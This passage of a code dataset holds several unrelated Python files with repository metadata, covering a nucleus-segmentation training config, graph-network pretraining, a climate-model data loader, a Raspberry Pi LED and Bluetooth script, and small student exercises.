parsarg.get('lr')\np = parsarg.get('p')\ncell_size = parsarg.get('S')\n\nx_0 = -0.3\nb = 30\nsize_encode = 100\nparameters = {}\nparameters['dim'] = 256\nparameters['S'] = cell_size\nparameters['batch size'] = 16\nparameters['epoch'] = 60\nparameters['learning rate'] = 1e-4\nparameters['p'] = 1e-2\n\n\n# create a binary pickle file \nf = open(\"training_params.pkl\",\"wb\")\n# write the python object (dict) to pickle file\npickle.dump(parameters,f)\n# close file\nf.close()\n\n\npath_data = '/home/ahabis/CompNet/datas'\npath_monuseg = '/home/ahabis/sshfs/monuseg'\npath_weights = '/home/ahabis/CompNet/weights/weights'\n\n\n#################################### LIST OF PATHS ############################################################\npath_monuseg_train = os.path.join(path_monuseg, 'patch_vahadane_train')\npath_monuseg_test = os.path.join(path_monuseg, 'patch_vahadane_test')\npath_monuseg_test_images = os.path.join(path_monuseg, 'MoNuSegTestData/tissue_images')\n\npath_click_train = os.path.join(path_monuseg, 'click_train')\npath_click_test = os.path.join(path_monuseg, 'click_test')\n\npath_stardist_train = os.path.join(path_monuseg, 'patch_stardist_train')\npath_stardist_test = os.path.join(path_monuseg, 'patch_stardist_test')\n\npath_gt_train = os.path.join(path_monuseg, 'patch_gt_train')\npath_gt_test = os.path.join(path_monuseg, 'patch_gt_test')\n\npath_contour_stardist_train = os.path.join(path_monuseg, 'contour_stardist_train')\npath_contour_stardist_test = os.path.join(path_monuseg, 'contour_stardist_test')\n\npath_contour_gt_train = os.path.join(path_monuseg, 'contour_gt_train')\npath_contour_gt_test = os.path.join(path_monuseg, 'contour_gt_test')\n\npath_H_train = os.path.join(path_monuseg, 'patch_H_train')\npath_E_train = os.path.join(path_monuseg, 'patch_E_train')\n\npath_H_test = os.path.join(path_monuseg, 'patch_H_test')\npath_E_test = os.path.join(path_monuseg, 'patch_E_test')\n\npath_click_gen_test = 
os.path.join(path_monuseg,'click_gen_test')\npath_click_gen_train = os.path.join(path_monuseg,'click_gen_train')\n\n############################################# DATAFRAMES #####################################################\n\nfar_df_test = pd.read_csv(os.path.join(path_data, 'far_df_test_50.csv'), index_col=0)\nfar_df_train = pd.read_csv(os.path.join(path_data, 'far_df_train_50.csv'), index_col=0)\ndf_distances_train = pd.read_csv(os.path.join(path_data, 'df_distances_train_20.csv'), index_col=0)\ndf_distances_test = pd.read_csv(os.path.join(path_data, 'df_distances_test_20.csv'), index_col=0)\n\n############################################# LOSSES ##########################################################\n\n\ndef weighted_binary_crossentropy(zero_weight, one_weight):\n\n def weighted_binary_crossentropy(y_true, y_pred):\n\n b_ce = K.binary_crossentropy(y_true, y_pred)\n\n weight_vector = y_true * one_weight + (1 - y_true) * zero_weight\n weighted_b_ce = weight_vector * b_ce\n\n return K.mean(weighted_b_ce)\n\n return weighted_binary_crossentropy\n\n\nwbce = weighted_binary_crossentropy(0.3,0.7)\n\nbce = tf.keras.losses.BinaryCrossentropy()\nmse = tf.keras.losses.MeanSquaredError()\n\n\n\ndef loss_cov(y_true,y_pred):\n\n angle_true, y_true_var = tf.split(y_true, [1, 2], axis=-1)\n angle_pred, y_pred_var = tf.split(y_pred, [1, 2], axis=-1)\n \n return tf.math.reduce_mean((angle_true - angle_pred)**2, keepdims = True, axis = -1) + tf.math.reduce_mean((y_true_var - y_pred_var)**2, keepdims = True, axis = -1)\n\n\ndef own_loss(y_true, y_pred):\n\n F, svd_true = tf.split(y_true, [1,3], axis = -1)\n svd_pred = y_pred\n\n return tf.math.reduce_mean(tf.math.multiply(F, loss_cov(svd_true,svd_pred))) \n\n\n\ndef own_metric(y_true,y_pred):\n y_true_p,_= tf.split(y_true,[1,3], axis = -1)\n y_pred_p,_= tf.split(y_pred,[1,3], axis = -1)\n return tf.math.sqrt(tf.math.reduce_mean((y_true_p - y_pred_p)**2))\n\n\n################################################################################################################\n\n# MIN = - 465.83\nMAX = 2445.44\n\n############################################ TRAINING PARAMETERS ##############################################\n\nlr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n parameters['learning rate'],\n decay_steps=100,\n decay_rate=0.96,\n staircase=True)\n\nopt = tf.keras.optimizers.Adam(lr_schedule)\nrmse = tf.keras.metrics.RootMeanSquaredError(name='root_mean_squared_error', dtype=None)\n\nmetrics = {\"output_1\": None,\n \"output_2\":own_metric,\n \"output_3\":rmse}\n\nlosses = {'output_1':bce,\n 'output_2':own_loss,\n 'output_3':wbce}\n\nloss_weights = {'output_1':0,\n 'output_2':1,\n 'output_3':1}\n\n\n\n\n\ncallback = tf.keras.callbacks.ModelCheckpoint(\n path_weights, monitor='val_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', save_freq='epoch',\n options=None)\n\n","repo_name":"antoinehabis/CompNet","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"5638652303","text":"#CTI-110\r\n#P4HW3_FACTORIAL\r\n#Stephon Smith\r\n#June 28, 2018\r\n#\r\n\r\nnum = int(input(\"Please enter a number: \")) #get number\r\nwhile num < 1:\r\n num = int(input(\"Please enter a positive number please: \")) #Make sure its not a negative\r\n\r\nfct = 1\r\n\r\nfor ctn in range( 1, num+1): #calculate\r\n fct = fct * ctn\r\nprint(\"\\nThe factorial of\", num, \"is\", fct) #print 
factorial\r\n","repo_name":"TheWiiz/CTI110","sub_path":"P4HW3_FACTORIAL_SmithStephon.py","file_name":"P4HW3_FACTORIAL_SmithStephon.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70678947922","text":"class WebOperation:\n @staticmethod\n def fetchSymbolData(symbol,from_date,to_date):\n import nsepy\n import time\n t1=time.time()\n print(\"fetching data from \",from_date,\" to \",to_date,\"for \",symbol)\n symbol_data = nsepy.get_history(symbol, from_date ,to_date )\n print(\"found records for \",symbol,symbol_data.shape,\" in \",time.time()-t1,\"Seconds\")\n return symbol_data\n","repo_name":"lirilkumar/MoveMarket","sub_path":"WebServices/WebOP.py","file_name":"WebOP.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"23943615412","text":"import argparse\nfrom functools import partial\n\nfrom loader import MoleculeDataset\nfrom dataloader import DataLoaderMasking, DataLoaderMaskingPred # , DataListLoader\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom model import GNN, GNNDecoder, CG\nfrom sklearn.metrics import roc_auc_score\n\nfrom splitters import scaffold_split, random_split, random_scaffold_split\nimport pandas as pd\n\nfrom util import MaskAtom\n\nfrom torch_geometric.nn import global_add_pool, global_mean_pool, global_max_pool\n\nfrom tensorboardX import SummaryWriter\n\nimport timeit\n\n\ndef compute_accuracy(pred, target):\n return float(torch.sum(torch.max(pred.detach(), dim=1)[1] == target).cpu().item()) / len(pred)\n\n\ndef sce_loss(x, y, alpha=1):\n x = F.normalize(x, p=2, dim=-1)\n y = F.normalize(y, p=2, dim=-1)\n\n # loss = - (x * y).sum(dim=-1)\n # loss = (x_h - y_h).norm(dim=1).pow(alpha)\n\n loss = (1 - (x * y).sum(dim=-1)).pow_(alpha)\n\n loss = loss.mean()\n return loss\n\n\ndef train_mae(args, model, loader, optimizer_model, device):\n\n\n model.train()\n loss_accum = 0\n\n epoch_iter = tqdm(loader, desc=\"Iteration\")\n for step, batch in enumerate(epoch_iter):\n batch = batch.to(device)\n loss = model(batch)\n\n # acc_node = compute_accuracy(pred_node, batch.mask_node_label[:,0])\n # acc_node_accum += acc_node\n\n optimizer_model.zero_grad()\n loss.backward()\n optimizer_model.step()\n model.update_target_network(0.9999)\n loss_accum += float(loss.cpu().item())\n epoch_iter.set_description(f\"train_loss: {loss.item():.4f}\")\n\n return loss_accum / step # , acc_node_accum/step, acc_edge_accum/step\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch implementation of pre-training of graph neural networks')\n parser.add_argument('--device', type=int, default=0,\n help='which gpu to use if any (default: 0)')\n parser.add_argument('--batch_size', type=int, default=256,\n help='input batch size for training (default: 256)')\n parser.add_argument('--epochs', type=int, default=100,\n help='number of epochs to train (default: 100)')\n parser.add_argument('--lr', type=float, default=0.001,\n help='learning rate (default: 0.001)')\n parser.add_argument('--decay', type=float, default=0,\n help='weight decay (default: 0)')\n parser.add_argument('--num_layer', type=int, default=5,\n help='number of GNN message passing layers (default: 5).')\n parser.add_argument('--emb_dim', type=int, default=300,\n help='embedding dimensions 
(default: 300)')\n parser.add_argument('--dropout_ratio', type=float, default=0.0,\n help='dropout ratio (default: 0)')\n parser.add_argument('--mask_rate', type=float, default=0.3,\n help='dropout ratio (default: 0.15)')\n parser.add_argument('--mask_edge', type=int, default=0,\n help='whether to mask edges or not together with atoms')\n parser.add_argument('--JK', type=str, default=\"last\",\n help='how the node features are combined across layers. last, sum, max or concat')\n parser.add_argument('--dataset', type=str, default='zinc_standard_agent',\n help='root directory of dataset for pretraining')\n parser.add_argument('--output_model_file', type=str, default='', help='filename to output the model')\n parser.add_argument('--gnn_type', type=str, default=\"gin\")\n parser.add_argument('--seed', type=int, default=0, help=\"Seed for splitting dataset.\")\n parser.add_argument('--num_workers', type=int, default=2, help='number of workers for dataset loading')\n parser.add_argument('--input_model_file', type=str, default=None)\n parser.add_argument(\"--alpha_l\", type=float, default=1.0)\n parser.add_argument(\"--alpha\", type=float, default=0.5)\n parser.add_argument(\"--loss_fn\", type=str, default=\"sce\")\n parser.add_argument(\"--decoder\", type=str, default=\"gin\")\n parser.add_argument(\"--use_scheduler\", action=\"store_true\", default=False)\n args = parser.parse_args()\n print(args)\n\n torch.manual_seed(0)\n np.random.seed(0)\n device = torch.device(\"cuda:\" + str(args.device)) if torch.cuda.is_available() else torch.device(\"cpu\")\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(0)\n\n print(\"num layer: %d mask rate: %f mask edge: %d\" % (args.num_layer, args.mask_rate, args.mask_edge))\n\n dataset_name = args.dataset\n # set up dataset and transform function.\n # dataset = MoleculeDataset(\"dataset/\" + args.dataset, dataset=args.dataset, transform = MaskAtom(num_atom_type = 119, num_edge_type = 5, mask_rate = args.mask_rate, mask_edge=args.mask_edge))\n dataset = MoleculeDataset(\"/home/yhkj/dhr/KDD/chem/dataset/\" + dataset_name, dataset=dataset_name)\n\n # loader = DataLoaderMasking(dataset, batch_size=args.batch_size, shuffle=True, num_workers = args.num_workers)\n loader = DataLoaderMaskingPred(dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers,\n mask_rate=args.mask_rate, mask_edge=args.mask_edge)\n\n # set up models, one for pre-training and one for context embeddings\n model = CG(args.num_layer, args.emb_dim, drop_ratio=args.dropout_ratio, gnn_type=args.gnn_type, alpha=args.alpha).to(\n device)\n # linear_pred_atoms = torch.nn.Linear(args.emb_dim, 119).to(device)\n # linear_pred_bonds = torch.nn.Linear(args.emb_dim, 4).to(device)\n\n # NUM_NODE_ATTR = 119 # + 3\n # atom_pred_decoder = GNNDecoder(args.emb_dim, NUM_NODE_ATTR, JK=args.JK, gnn_type=args.gnn_type).to(device)\n\n # model_list = [model, atom_pred_decoder]\n\n # set up optimizers\n optimizer_model = optim.Adam(model.trainable_parameters(), lr=args.lr, weight_decay=args.decay)\n # optimizer_dec_pred_atoms = optim.Adam(atom_pred_decoder.parameters(), lr=args.lr, weight_decay=args.decay)\n\n # optimizer_list = [optimizer_model, optimizer_dec_pred_atoms]\n\n for epoch in range(1, args.epochs + 1):\n print(\"====epoch \" + str(epoch))\n\n # train_loss, train_acc_atom, train_acc_bond = train(args, model_list, loader, optimizer_list, device)\n # print(train_loss, train_acc_atom, train_acc_bond)\n\n train_loss = train_mae(args, model, loader, optimizer_model, device)\n\n 
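# NOTE (added): the checkpoint below is rewritten every epoch with the same\n # filename, so only the most recent epoch's weights survive a full run\n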
output_file = f\"_{args.gnn_type}_{args.mask_rate}_{args.alpha}\"\n torch.save(model.state_dict(), output_file + \".pth\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DuanhaoranCC/Masked_Graph_Aug","sub_path":"chem/pretraining.py","file_name":"pretraining.py","file_ext":"py","file_size_in_byte":6732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6220480382","text":"import RPi.GPIO as GPIO\nimport time\nfrom bluetooth import *\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n#led configuration\nled1=14\nled2=15\npwm_pin=13\n\nGPIO_out=[led1,led2,pwm_pin]\nGPIO.setup(GPIO_out,GPIO.OUT)\n#GPIO.setup(pir,GPIO.IN)\n\nserver = BluetoothSocket(RFCOMM)\nserver.bind((\"\", PORT_ANY))\nserver.listen(3)\nprint(\"start server...\")\n\np1=GPIO.PWM(led1,70)\np2=GPIO.PWM(led2,70)\np1.start(0)\np2.start(0)\np = GPIO.PWM(pwm_pin, 100)\n\n\ntry:\n client, info = server.accept()\n print(\"client mac:\", info[0], \", port:\", info[1])\nexcept KeyboardInterrupt:\n server.close()\n exit()\n\ndef dual():\n print('LED fading effect!')\n #client.send('LED fading effect!'.encode())\n for dc in range(0, 101, 5):\n p1.ChangeDutyCycle(dc)\n p2.ChangeDutyCycle(100 - dc)\n time.sleep(0.03)\n\n for dc in range(0, 101, 5):\n p1.ChangeDutyCycle(100 - dc)\n p2.ChangeDutyCycle(dc)\n time.sleep(0.03)\n\ndef sensor():\n p.start(100)\n p.ChangeDutyCycle(90)\n p.ChangeFrequency(261)\n time.sleep(1)\n #p.stop()\n\n print(\"Intruders!\")\n #client.send('Intruders!'.encode())\n GPIO.output(led1, True)\n time.sleep(0.8)\n\n # elif (count==0):\n # print(\"Now in safe!\")\n # #client.send('Now in safe!'.encode())\n #\n # time.sleep(0.8)\n\ntry:\n while True:\n #data = client.recv(1024)\n count=int(input(\"count=\"))\n sensor(count)\n dual(count)\n\n#\n#\nexcept KeyboardInterrupt:\n print(\"terminate\")\n# client.close()\n# server.close()\n","repo_name":"jieuihong/CountOnMe","sub_path":"codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38331228198","text":"\"\"\"\nRead the data saved by model_input_data_process.py\nand make available for model training and testing\n\"\"\"\n\nimport numpy as np\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport h5py\n\n# locations={ \"train_test_datadir\":\"/project/spice/radiation/ML/CRM/data/models/datain\"}\n\nclass Data_IO_validation(object):\n def __init__(self, region, locations):\n self.region = region\n self.locations = locations\n\n def get_data(self, subdomain): \n dataset_file = \"{0}/validation_{1}/validation_data_{1}_{2}.hdf5\".format(self.locations[\"train_test_datadir\"],self.region, str(subdomain).zfill(3))\n print(\"Reading dataset file: {0}\".format(dataset_file))\n dataset=h5py.File(dataset_file,'r')\n\n self.q_tot_test = dataset[\"q_tot_test\"]\n self.q_tot_adv_test = dataset[\"q_adv_test\"]\n self.theta_test = dataset[\"air_potential_temperature_test\"]\n self.theta_adv_test = dataset[\"t_adv_test\"]\n self.sw_toa_test = dataset[\"toa_incoming_shortwave_flux_test\"]\n self.shf_test = dataset[\"surface_upward_sensible_heat_flux_test\"]\n self.lhf_test = dataset[\"surface_upward_latent_heat_flux_test\"]\n self.theta_phys_test = dataset[\"t_phys_test\"]\n self.qphys_test = dataset[\"q_phys_test\"]\n\nclass Data_IO(object):\n def __init__(self, region, locations):\n self.region = region\n self.locations = locations\n \n 
dataset_file = \"{0}/train_test_data_{1}.hdf5\".format(self.locations[\"train_test_datadir\"],self.region)\n print(\"Reading dataset file: {0}\".format(dataset_file))\n dataset=h5py.File(dataset_file,'r')\n \n self.q_tot_train = dataset[\"q_tot_train\"]\n self.q_tot_adv_train = dataset[\"q_adv_train\"]\n self.theta_train = dataset[\"air_potential_temperature_train\"]\n self.theta_adv_train = dataset[\"t_adv_train\"]\n self.sw_toa_train = dataset[\"toa_incoming_shortwave_flux_train\"]\n self.shf_train = dataset[\"surface_upward_sensible_heat_flux_train\"]\n self.lhf_train = dataset[\"surface_upward_latent_heat_flux_train\"]\n self.theta_phys_train = dataset[\"t_phys_train\"]\n self.qphys_train = dataset[\"q_phys_train\"]\n\n\n self.q_tot_test = dataset[\"q_tot_test\"]\n self.q_tot_adv_test = dataset[\"q_adv_test\"]\n self.theta_test = dataset[\"air_potential_temperature_test\"]\n self.theta_adv_test = dataset[\"t_adv_test\"]\n self.sw_toa_test = dataset[\"toa_incoming_shortwave_flux_test\"]\n self.shf_test = dataset[\"surface_upward_sensible_heat_flux_test\"]\n self.lhf_test = dataset[\"surface_upward_latent_heat_flux_test\"]\n self.theta_phys_test = dataset[\"t_phys_test\"]\n self.qphys_test = dataset[\"q_phys_test\"]\n\n\n \n \n # self.train_data_in, self.train_data_out, self.test_data_in, self.test_data_out = self.scm_model_data()\n\n # self.q_norm_train = self.train_data_in[\"qtot\"]\n # self.qnext_norm_train = self.train_data_in[\"qtot_next\"]\n # self.q_norm_train_s = self.train_data_in[\"qtot_s\"]\n # self.qnext_norm_train_s = self.train_data_in[\"qtot_next_s\"]\n # # self.qadv_norm_train = self.train_data_in[\"qadv\"]\n # self.qadv_dot_norm_train = self.train_data_in[\"qadv_dot\"]\n # self.qadv_dot_norm_train_s = self.train_data_in[\"qadv_dot_s\"]\n # # self.qphys_norm_train = self.train_data_out[\"qphys_tot\"]\n # self.qphys_dot_norm_train = self.train_data_out[\"qphys_dot\"]\n # self.qphys_dot_norm_train_s = self.train_data_out[\"qphys_dot_s\"]\n\n # self.q_norm_test = self.test_data_in[\"qtot_test\"]\n # self.qnext_norm_test = self.test_data_in[\"qtot_next_test\"]\n # self.q_norm_test_s = self.test_data_in[\"qtot_test_s\"]\n # self.qnext_norm_test_s = self.test_data_in[\"qtot_next_test_s\"]\n # # self.qadv_norm_test = self.test_data_in[\"qadv_test\"]\n # self.qadv_dot_norm_test = self.test_data_in[\"qadv_dot_test\"]\n # self.qadv_dot_norm_test_s = self.test_data_in[\"qadv_dot_test_s\"]\n # # self.qphys_norm_test = self.test_data_out[\"qphys_test\"]\n # self.qphys_dot_norm_test = self.test_data_out[\"qphys_dot_test\"]\n # self.qphys_dot_norm_test_s = self.test_data_out[\"qphys_dot_test_s\"]\n # # self.qadd_train = self.train_data_in[\"qadd\"]\n # self.qadd_dot_train = self.train_data_in[\"qadd_dot\"]\n # self.qadd_dot_train_s = self.train_data_in[\"qadd_dot_s\"]\n # # self.qadd_test = self.test_data_in[\"qadd_test\"]\n # self.qadd_dot_test = self.test_data_in[\"qadd_dot_test\"]\n # self.qadd_dot_test_s = self.test_data_in[\"qadd_dot_test_s\"]\n # self.q_test_raw = self.test_data_in[\"qtot_test_raw\"]\n # self.q_test_raw_s = self.test_data_in[\"qtot_test_raw_s\"]\n # # self.qadv_test_raw = self.test_data_in[\"qadv_test_raw\"]\n # self.qadv_dot_test_raw = self.test_data_in[\"qadv_dot_test_raw\"]\n # self.qadv_dot_test_raw_s = self.test_data_in[\"qadv_dot_test_raw_s\"]\n # # self.qphys_test_raw = self.test_data_out[\"qphys_test_raw\"]\n # self.qphys_dot_test_raw = self.test_data_out[\"qphys_dot_test_raw\"]\n # self.qphys_dot_test_raw_s = self.test_data_out[\"qphys_dot_test_raw_s\"]\n 
\n # self.t_train = self.train_data_in[\"T\"]\n # self.t_test = self.test_data_in[\"T_test\"]\n # self.tadv_dot_train = self.train_data_in[\"tadv_dot\"]\n # self.tadv_dot_test = self.test_data_in[\"tadv_dot_test\"]\n\n # self.lhf_train = self.train_data_in['latent_up']\n # self.lhf_test = self.test_data_in['latent_up_test']\n # self.shf_train = self.train_data_in['sensible_up']\n # self.shf_test = self.test_data_in['sensible_up_test']\n # self.toa_swdown_train = self.train_data_in['sw_toa_down']\n # self.toa_swdown_test = self.test_data_in['sw_toa_down_test']\n\n\n # def scm_model_data(self):\n # \"\"\"\n # Data for model with all SCM type inputs and outputs\n # \"\"\"\n # # dataset_file = \"train_test_data_all_m1p1{0}.npz\".format(region)\n # # dataset=np.load(\"{0}/{1}\".format(locations[\"train_test_datadir\"],dataset_file))\n # dataset_file = \"{0}/train_test_data_all_{1}_std.hdf5\".format(self.locations[\"train_test_datadir\"],self.region)\n # dataset=h5py.File(dataset_file,'r')\n \n # q_tot_train = dataset[\"q_tot_train\"]\n # q_tot_adv_train = dataset[\"q_adv_train\"]\n # theta_train = dataset[\"air_potential_temperature_train\"]\n # theta_adv_train = dataset[\"t_adv_train\"]\n # sw_toa_train = dataset[\"toa_incoming_shortwave_flux_train\"]\n # shf_train = dataset[\"surface_upward_sensible_heat_flux_train\"]\n # lhf_train = dataset[\"surface_upward_latent_heat_flux\"]\n # theta_phys_train = dataset[\"t_phys\"]\n # qphys_train = dataset[\"q_phys\"]\n\n\n # train_data_in = {\"qtot_train\":q_tot_train, \"qadv_train\":q_tot_adv_train, \"theta_train\":theta_train, \"theta_adv_train\":theta_adv_train, \"shf_train\":shf_train, \"lhf_train\":lhf_train, \"sw_toa_train\":sw_toa_train}\n # train_data_out = {\"theta_phys_train\":theta_phys_train, \"qphys_train\":qphys_train}\n\n # q_tot_test = dataset[\"q_tot_test\"]\n # q_tot_adv_test = dataset[\"q_adv_test\"]\n # theta_test = dataset[\"air_potential_temperature_test\"]\n # theta_adv_test = dataset[\"t_adv_test\"]\n # sw_toa_test = dataset[\"toa_incoming_shortwave_flux_test\"]\n # shf_test = dataset[\"surface_upward_sensible_heat_flux_test\"]\n # lhf_test = dataset[\"surface_upward_latent_heat_flux\"]\n # theta_phys_test = dataset[\"t_phys\"]\n # qphys_test = dataset[\"q_phys\"]\n\n\n # test_data_in = {\"qtot_test\":q_tot_test, \"qadv_test\":q_tot_adv_test, \"theta_test\":theta_test, \"theta_adv_test\":theta_adv_test, \"shf_test\":shf_test, \"lhf_test\":lhf_test, \"sw_toa_test\":sw_toa_test}\n # test_data_out = {\"theta_phys_test\":theta_phys_test, \"qphys_test\":qphys_test}\n \n # return train_data_in, train_data_out, test_data_in, test_data_out\n\n # qtot = dataset[\"qtot\"]\n # qtot_next = dataset[\"qtot_next\"]\n # qtot_s = dataset[\"qtot_s\"]\n # qtot_next_s = dataset[\"qtot_next_s\"]\n # # qphys_tot = dataset[\"qphys_tot\"]\n # qphys_dot = dataset[\"qphys_dot\"]\n # qphys_dot_s = dataset[\"qphys_dot_s\"]\n # # qadv = dataset[\"qadv\"]\n # qadv_dot = dataset[\"qadv_dot\"]\n # qadv_dot_s = dataset[\"qadv_dot_s\"]\n # # qadd = dataset[\"qadd\"]\n # qadd_dot = dataset[\"qadd_dot\"] #qtot + qadv_dot*600. \n # qadd_dot_s = dataset[\"qadd_dot_s\"] #qtot + qadv_dot*600. 
\n # # tadd = dataset[\"tadd\"]\n # tadd_dot = dataset[\"tadd_dot\"] \n # T = dataset[\"T\"]\n # tphys = dataset[\"tphys\"]\n # # tadv = dataset[\"tadv\"]\n # tadv_dot = dataset[\"tadv_dot\"]\n # sw_toa_down = dataset[\"sw_toa_down\"]\n # latent_up = dataset[\"latent_up\"]\n # sensible_up = dataset[\"sensible_up\"]\n # mslp = dataset[\"mslp\"]\n # sw_toa_up = dataset[\"sw_toa_up\"]\n # lw_toa_up = dataset[\"lw_toa_up\"]\n # sw_down = dataset[\"sw_down\"]\n # lw_down = dataset[\"lw_down\"]\n # rain = dataset[\"rain\"]\n # snow = dataset[\"snow\"]\n # # train_model_data_in = np.concatenate((qtot, qadv, T, tadv, sw_toa_down, latent_up, sensible_up, mslp), axis=1)\n # # train_model_data_out = np.concatenate((qphys_tot, tphys, sw_toa_up, lw_toa_up, sw_down, lw_down, rain, snow), axis=1)\n\n # qtot_test = dataset[\"qtot_test\"]\n # qtot_next_test = dataset[\"qtot_next_test\"]\n # qtot_test_s = dataset[\"qtot_test_s\"]\n # qtot_next_test_s = dataset[\"qtot_next_test_s\"]\n # # qphys_test = dataset[\"qphys_test\"] \n # qphys_dot_test = dataset[\"qphys_dot_test\"] \n # qphys_dot_test_s = dataset[\"qphys_dot_test_s\"] \n # # qadv_test = dataset[\"qadv_test\"]\n # qadv_dot_test = dataset[\"qadv_dot_test\"]\n # qadv_dot_test_s = dataset[\"qadv_dot_test_s\"]\n # # qadd_test = dataset[\"qadd_test\"]\n # qadd_dot_test = dataset[\"qadd_dot_test\"]\n # qadd_dot_test_s = dataset[\"qadd_dot_test_s\"]\n # # tadd_test = dataset[\"tadd_test\"]\n # tadd_dot_test = dataset[\"tadd_dot_test\"]\n # T_test = dataset[\"T_test\"]\n # tphys_test = dataset[\"tphys_test\"]\n # # tadv_test = dataset[\"tadv_test\"]\n # tadv_dot_test = dataset[\"tadv_dot_test\"]\n # sw_toa_down_test = dataset[\"sw_toa_down_test\"]\n # latent_up_test = dataset[\"latent_up_test\"]\n # sensible_up_test = dataset[\"sensible_up_test\"]\n # mslp_test = dataset[\"mslp_test\"]\n # sw_toa_up_test = dataset[\"sw_toa_up_test\"]\n # lw_toa_up_test = dataset[\"lw_toa_up_test\"]\n # sw_down_test = dataset[\"sw_down_test\"]\n # lw_down_test = dataset[\"lw_down_test\"]\n # rain_test = dataset[\"rain_test\"]\n # snow_test = dataset[\"snow_test\"]\n\n # qtot_test_raw = dataset[\"qtot_test_raw\"]\n # qtot_test_raw_s = dataset[\"qtot_test_raw_s\"]\n # # qadv_test_raw = dataset[\"qadv_test_raw\"]\n # qadv_dot_test_raw = dataset[\"qadv_dot_test_raw\"]\n # qadv_dot_test_raw_s = dataset[\"qadv_dot_test_raw_s\"]\n # # qadd_test_raw = dataset[\"qadd_test_raw\"] \n # qadd_dot_test_raw = dataset[\"qadd_dot_test_raw\"]\n # qadd_dot_test_raw_s = dataset[\"qadd_dot_test_raw_s\"]\n # # tadd_test_raw = dataset[\"tadd_test_raw\"] \n # tadd_dot_test_raw = dataset[\"tadd_dot_test_raw\"]\n # # qphys_test_raw = dataset[\"qphys_test_raw\"]\n # qphys_dot_test_raw = dataset[\"qphys_dot_test_raw\"]\n # qphys_dot_test_raw_s = dataset[\"qphys_dot_test_raw_s\"]\n # qadd_test_raw = qtot_test_raw[:] + qadv_dot_test_raw[:] \n # qadd_test_raw_s = qtot_test_raw_s[:] + qadv_dot_test_raw_s[:] \n # # test_model_data_in = np.concatenate((qtot_test, qadv_test, T_test, tadv_test, sw_toa_down_test, latent_up_test, sensible_up_test, mslp_test), axis=1)\n # # test_model_data_out = np.concatenate((qphys_test, tphys_test, sw_toa_up_test, lw_toa_up_test, sw_down_test, lw_down_test, rain_test, snow_test), axis=1)\n\n # train_data_in = {\"qtot\":qtot, \"qtot_s\":qtot_s, \"qtot_next\":qtot_next, \"qtot_next_s\":qtot_next_s, \"qadv_dot\":qadv_dot, \"qadv_dot_s\":qadv_dot_s, \"qadd_dot\":qadd_dot, \"qadd_dot_s\":qadd_dot_s, \"T\":T, \"tadv_dot\":tadv_dot, \"sw_toa_down\":sw_toa_down, 
\"latent_up\":latent_up, \"sensible_up\":sensible_up, \"mslp\":mslp}\n # train_data_out = {\"qphys_dot\":qphys_dot, \"qphys_dot_s\":qphys_dot_s, \"tphys\":tphys, \"sw_toa_up\":sw_toa_up, \"lw_toa_up\":lw_toa_up, \"sw_down\":sw_down, \"lw_down\":lw_down, \"rain\":rain, \"snow\":snow}\n # test_data_in = {\"qtot_test\":qtot_test, \"qtot_next_test\":qtot_next_test, \"qtot_test_s\":qtot_test_s, \"qtot_next_test_s\":qtot_next_test_s, \"qadv_dot_test\":qadv_dot_test, \"qadv_dot_test_s\":qadv_dot_test_s, \"qadd_dot_test\":qadd_dot_test, \"qadd_dot_test_s\":qadd_dot_test_s, \"qadd_test_raw\":qadd_test_raw, \"qadd_dot_test_raw\":qadd_dot_test_raw, \"qadd_dot_test_raw_s\":qadd_dot_test_raw_s, \"T_test\":T_test, \"tadv_dot_test\":tadv_dot_test, \"tadd_dot_test\":tadd_dot_test, \"tadd_dot_test_raw\":tadd_dot_test_raw, \"sw_toa_down_test\":sw_toa_down_test, \"latent_up_test\":latent_up_test, \"sensible_up_test\":sensible_up_test, \"mslp\":mslp_test, \"qadv_dot_test_raw\":qadv_dot_test_raw, \"qadv_dot_test_raw_s\":qadv_dot_test_raw_s,\"qtot_test_raw\":qtot_test_raw, \"qtot_test_raw_s\":qtot_test_raw_s,}\n # test_data_out = { \"qphys_dot_test\":qphys_dot_test, \"qphys_dot_test_s\":qphys_dot_test_s, \"tphys_test\":tphys_test, \"sw_toa_up_test\":sw_toa_up_test, \"low_toa_up_test\":lw_toa_up_test, \"sw_down_test\":sw_down_test, \"lw_down_test\":lw_down_test, \"rain_test\":rain_test, \"snow_test\":snow_test, \"qphys_dot_test_raw\":qphys_dot_test_raw, \"qphys_dot_test_raw_s\":qphys_dot_test_raw_s}\n \n # return train_data_in, train_data_out, test_data_in, test_data_out","repo_name":"omarjamil/caramel","sub_path":"model/torch/jupyter/data_io.py","file_name":"data_io.py","file_ext":"py","file_size_in_byte":13932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72304163920","text":"A = [1,3,5,7]\r\n\r\ni = 1\r\n\r\nfor x in range(0,10) :\r\n i = i + 2\r\n print(i)\r\nprint(\"=-\" * 30)\r\n\r\nB = [2, 4, 8, 16, 32, 64]\r\ni = 2\r\nfor x in range(0,10) :\r\n i = i * 2\r\n print(i)\r\nprint(\"=-\" * 30)\r\n\r\nC = [0, 1, 4, 9, 16, 25, 36]\r\ni = 